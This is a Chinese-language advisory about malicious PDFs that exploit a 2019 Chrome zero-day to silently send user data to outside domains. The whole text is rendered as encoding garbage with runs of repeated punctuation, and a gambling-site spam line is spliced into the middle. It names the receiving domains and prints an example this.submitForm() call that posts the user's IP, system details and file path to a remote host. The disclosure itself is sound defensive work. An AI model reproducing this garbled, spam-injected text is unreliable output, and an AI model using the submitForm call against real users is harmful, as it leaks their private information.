¶ñÒâPDFÎļþʹÓÃChromeä¯ÀÀÆ÷0dayÎó²îÇ徲ͨ¸æ

Ðû²¼Ê±¼ä 2019-03-01

Îó²î±àºÅºÍ¼¶±ð


CVE±àºÅ£ºÔÝÎÞ£¬£¬£¬£¬£¬£¬Î£ÏÕ¼¶±ð£º¸ßΣ£¬£¬£¬£¬£¬£¬ CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨


Ó°Ïì¹æÄ£


ÊÜÓ°Ïì°æ±¾£º 


Google Chromeä¯ÀÀÆ÷ËùÓа汾


Îó²î¸ÅÊö


½üÆÚ£¬£¬£¬£¬£¬£¬À´×ÔÍâÑóµÄÇå¾²Ñо¿Ö°Ô±ÔÚÒ°Íâ¼ì²âµ½¶à¸öPDF¶ñÒâÑù±¾¡£¡£¡£¡£¡£ÕâЩÑù±¾Ê¹ÓÃÁËChromeä¯ÀÀÆ÷µÄ0dayÎó²î£¬£¬£¬£¬£¬£¬ÒÔʵÏÖ×·×ÙÓû§²¢ÇÄÇÄÄ³Ð©ÍøÂçÓû§ÐÅÏ¢µÄÄ¿µÄ¡£¡£¡£¡£¡£


ÏÖÔÚ·¢Ã÷ÁËÁ½×éʹÓÃChromeÁãÈÕÎó²îµÄ¶ñÒâPDFÎļþ£¬£¬£¬£¬£¬£¬ÆäÖÐÒ»×éÎļþÔÚ2017Äê10ÔÂÈö²¥£¬£¬£¬£¬£¬£¬ÁíÒ»×éÎļþÔÚ2018Äê9ÔÂÈö²¥¡£¡£¡£¡£¡£µÚÒ»Åú¶ñÒâPDFÎļþ½«Óû§Êý¾Ý·¢Ëͻء°readnotify.com¡±£¬£¬£¬£¬£¬£¬µÚ¶þÅú·¢Ëͻء°zuxjk0dftoamimorjl9dfhr44vap3fr7ovgi76w.burpcollaborator.net¡±¡£¡£¡£¡£¡£


Îó²îµÄȪԴÔÚÓÚthis.submitForm()Õâ¸öPDF Javascript API¡£¡£¡£¡£¡£Ïñthis.submitForm('http://google.com/test')ÕâÑùÒ»¸ö¼òÆÓµÄŲÓþͻᵼÖÂChrome°ÑСÎÒ˽¼ÒÐÅÏ¢·¢Ë͵½google.com¡£¡£¡£¡£¡£¿£¿£¿ÉÄܱ»Ð¹Â¶µÄÐÅÏ¢°üÀ¨£º


1.Óû§µÄ¹«¹²IPµØµã¡£¡£¡£¡£¡£

2.²Ù×÷ϵͳ£¬£¬£¬£¬£¬£¬Chrome°æ±¾µÈ(ÔÚHTTP POST headerÖÐ)¡£¡£¡£¡£¡£

3.Óû§ÅÌËã»úÉÏPDFÎļþµÄÍêÕû·¾¶(ÔÚHTTP POST payloadÖÐ)¡£¡£¡£¡£¡£


µ±Óû§Ê¹ÓÃChromeä¯ÀÀÆ÷·­¿ªÕâЩ¶ñÒâÑù±¾Ê±£¬£¬£¬£¬£¬£¬Ñù±¾»áÔËÐжñÒâ´úÂ룬£¬£¬£¬£¬£¬ÔÚδ¾­Óû§Åú×¼µÄÇéÐÎÏ£¬£¬£¬£¬£¬£¬ÒÔHTTP POSTÊý¾Ý°üµÄÐÎʽ½«Ò»Ð©Óû§ÐÅÏ¢¾²Ä¬·¢Ë͵½Ö¸¶¨Óò¡°readnotify.com ¡±¡£¡£¡£¡£¡£


ÈËÉú¾ÍÊDz©-×ðÁú¿­Ê±Öйú¹ÙÍø


³ýÈ¥ÐÅϢй¶ÒÔÍ⣬£¬£¬£¬£¬£¬¸ÃÎó²îÔÝδ·¢Ã÷ÆäËüʹÓ÷½·¨£¬£¬£¬£¬£¬£¬µ«ºÁÎÞÒÉÎÊ£¬£¬£¬£¬£¬£¬ÕâЩй¶µÄÓû§ÐÅÏ¢¿ÉÒÔ×ÊÖú¹¥»÷Õß¾ÙÐиü¶à»î¶¯¡£¡£¡£¡£¡£


ÐÞ¸´½¨Òé


ÏÖÔÚ¸Ã0dayÎó²îÉÐδÓйٷ½²¹¶¡£¬£¬£¬£¬£¬£¬µ«ChromeÍŶӻòÐí½«ÓÚ4ÔÂβÐÞ¸´¸ÃÎó²î¡£¡£¡£¡£¡£


ÔÝʱ»º½â²½·¥£º

ÔÚ²¹¶¡Ðû²¼Ö®Ç°£¬£¬£¬£¬£¬£¬½¨ÒéÓû§Ê¹ÓÃPDFÔĶÁÆ÷Ó¦ÓóÌÐòÔÚÍâµØÉó²éPDFÎĵµ£¬£¬£¬£¬£¬£¬Ö±µ½ChromeÐÞ¸´Îó²î¡£¡£¡£¡£¡£»£»£»òÔÚChromeÖз­¿ªPDFÎĵµÊ±¶Ï¿ªÅÌËã»úÓëInternetµÄÅþÁ¬¡£¡£¡£¡£¡£


²Î¿¼Á´½Ó


https://blog.edgespot.io/2019/02/edgespot-detects-pdf-zero-day-samples.html